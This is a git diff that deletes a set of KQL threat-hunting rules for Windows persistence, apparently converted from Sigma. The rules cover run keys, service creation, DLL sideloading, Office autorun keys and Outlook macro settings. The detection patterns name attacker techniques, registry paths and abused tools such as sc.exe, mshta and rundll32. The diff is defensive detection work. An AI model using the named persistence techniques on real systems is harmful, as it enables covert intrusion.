@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql b/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
deleted file mode 100644
index 249e40b4..00000000
--- a/Persistence/Narrator_s_Feedback-Hub_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: high
-// Description: Detects abusing Windows 10 Narrator's Feedback-Hub
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)"
\ No newline at end of file
diff --git a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql b/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 5b941e28..00000000
--- a/Persistence/New_ActiveScriptEventConsumer_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/06/25
-// Level: high
-// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE "
\ No newline at end of file
diff --git a/Persistence/New_Custom_Shim_Database_Created.kql b/Persistence/New_Custom_Shim_Database_Created.kql
deleted file mode 100644
index 5ffd2880..00000000
--- a/Persistence/New_Custom_Shim_Database_Created.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/29
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\"
\ No newline at end of file
diff --git a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql b/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Persistence/New_Kernel_Driver_Via_SC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql b/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
deleted file mode 100644
index 30e9ae74..00000000
--- a/Persistence/New_Netsh_Helper_DLL_Registered_From_A_Suspicious_Location.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/11/28
-// Level: high
-// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
-// Tags: attack.persistence, attack.t1546.007
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Persistence/New_ODBC_Driver_Registered.kql b/Persistence/New_ODBC_Driver_Registered.kql
deleted file mode 100644
index 08b8669c..00000000
--- a/Persistence/New_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: low
-// Description: Detects the registration of a new ODBC driver.
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey contains "\\SQL Server"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver"))))
\ No newline at end of file
diff --git a/Persistence/New_Outlook_Macro_Created.kql b/Persistence/New_Outlook_Macro_Created.kql
deleted file mode 100644
index d9d853ed..00000000
--- a/Persistence/New_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ScoubiMtl
-// Date: 2021/04/05
-// Level: medium
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM"
\ No newline at end of file
diff --git a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql b/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
deleted file mode 100644
index d2608baa..00000000
--- a/Persistence/New_RUN_Key_Pointing_to_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
-// Date: 2018/08/25
-// Level: high
-// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (((RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Desktop\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "%temp%\\" or RegistryValueData contains "%tmp%\\") or (RegistryValueData startswith "%Public%\\" or RegistryValueData startswith "wscript" or RegistryValueData startswith "cscript")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce")) and (not(((RegistryValueData contains "rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32" and RegistryValueData contains "C:\\Windows\\Temp\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_PowerShell.kql b/Persistence/New_Service_Creation_Using_PowerShell.kql
deleted file mode 100644
index ce9fb3fa..00000000
--- a/Persistence/New_Service_Creation_Using_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/Persistence/New_Service_Creation_Using_Sc.EXE.kql b/Persistence/New_Service_Creation_Using_Sc.EXE.kql
deleted file mode 100644
index dd56c1e4..00000000
--- a/Persistence/New_Service_Creation_Using_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
deleted file mode 100644
index ef12160b..00000000
--- a/Persistence/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/Persistence/New_User_Created_Via_Net.EXE.kql b/Persistence/New_User_Created_Via_Net.EXE.kql
deleted file mode 100644
index a83f4599..00000000
--- a/Persistence/New_User_Created_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
-// Date: 2018/10/30
-// Level: medium
-// Description: Identifies the creation of local users via the net.exe command.
-// Tags: attack.persistence, attack.t1136.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql b/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql
deleted file mode 100644
index 7e3622ff..00000000
--- a/Persistence/New_User_Created_Via_Net.EXE_With_Never_Expire_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects creation of local users via the net.exe command with the option "never expire"
-// Tags: attack.persistence, attack.t1136.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Persistence/Office_Application_Startup_-_Office_Test.kql b/Persistence/Office_Application_Startup_-_Office_Test.kql
deleted file mode 100644
index 83afa561..00000000
--- a/Persistence/Office_Application_Startup_-_Office_Test.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/25
-// Level: medium
-// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
-// Tags: attack.persistence, attack.t1137.002
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf"
\ No newline at end of file
diff --git a/Persistence/Office_Autorun_Keys_Modification.kql b/Persistence/Office_Autorun_Keys_Modification.kql
deleted file mode 100644
index a9ff5181..00000000
--- a/Persistence/Office_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office") and (RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey contains "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1" or RegistryKey contains "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect" or RegistryKey contains "\\Excel\\Addins\\NativeShim" or RegistryKey contains "\\Excel\\Addins\\NativeShim.InquireConnector.1" or RegistryKey contains "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1" or RegistryKey contains "\\Outlook\\AddIns\\AccessAddin.DC" or RegistryKey contains "\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector" or RegistryKey contains "\\Outlook\\AddIns\\EvernoteOLRD.Connect" or RegistryKey contains "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1" or RegistryKey contains "\\Outlook\\Addins\\OcOffice.OcForms" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey contains "\\Outlook\\Addins\\OscAddin.Connect" or RegistryKey contains "\\Outlook\\Addins\\OutlookChangeNotifier.Connect" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))))
\ No newline at end of file
diff --git a/Persistence/OilRig_APT_Registry_Persistence.kql b/Persistence/OilRig_APT_Registry_Persistence.kql
deleted file mode 100644
index 83beccff..00000000
--- a/Persistence/OilRig_APT_Registry_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018/03/23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// Tags: attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense_evasion, attack.t1112, attack.command_and_control, attack.t1071.004
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql b/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql
deleted file mode 100644
index 2f3f3dd3..00000000
--- a/Persistence/Outlook_Macro_Execution_Without_Warning_Setting_Enabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ScoubiMtl
-// Date: 2021/04/05
-// Level: high
-// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceRegistryEvents
-| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level"
\ No newline at end of file
diff --git a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql b/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql
deleted file mode 100644
index 88473077..00000000
--- a/Persistence/Outlook_Security_Settings_Updated_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/28
-// Level: medium
-// Description: Detects changes to the registry values related to outlook security settings
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Security"
\ No newline at end of file
diff --git a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql b/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Persistence/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Persistence/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Persistence/Path_To_Screensaver_Binary_Modified.kql b/Persistence/Path_To_Screensaver_Binary_Modified.kql
deleted file mode 100644
index 0e968bc4..00000000
--- a/Persistence/Path_To_Screensaver_Binary_Modified.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz @bczyz1, oscd.community
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects value modification of registry key containing path to binary used as screensaver.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql b/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql
deleted file mode 100644
index f6b54c27..00000000
--- a/Persistence/Persistence_Via_Disk_Cleanup_Handler_-_Autorun.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
-The disk cleanup manager is part of the operating system.
-It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString")))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_Hhctrl.ocx.kql b/Persistence/Persistence_Via_Hhctrl.ocx.kql
deleted file mode 100644
index 288132ef..00000000
--- a/Persistence/Persistence_Via_Hhctrl.ocx.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_New_SIP_Provider.kql b/Persistence/Persistence_Via_New_SIP_Provider.kql
deleted file mode 100644
index 08cf0096..00000000
--- a/Persistence/Persistence_Via_New_SIP_Provider.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql b/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql
deleted file mode 100644
index c30822e7..00000000
--- a/Persistence/Persistence_Via_TypedPaths_-_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: medium
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
-// Tags: attack.persistence
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"
\ No newline at end of file
diff --git a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Persistence/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Persistence/Potential_7za.DLL_Sideloading.kql b/Persistence/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Persistence/Potential_7za.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql b/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql
deleted file mode 100644
index 6eca1244..00000000
--- a/Persistence/Potential_Amazon_SSM_Agent_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Muhammad Faisal
-// Date: 2023/08/02
-// Level: medium
-// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
-// Tags: attack.command_and_control, attack.persistence, attack.t1219
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
diff --git a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql b/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Persistence/Potential_Antivirus_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql b/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql
deleted file mode 100644
index af503f0f..00000000
--- a/Persistence/Potential_Binary_Or_Script_Dropper_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
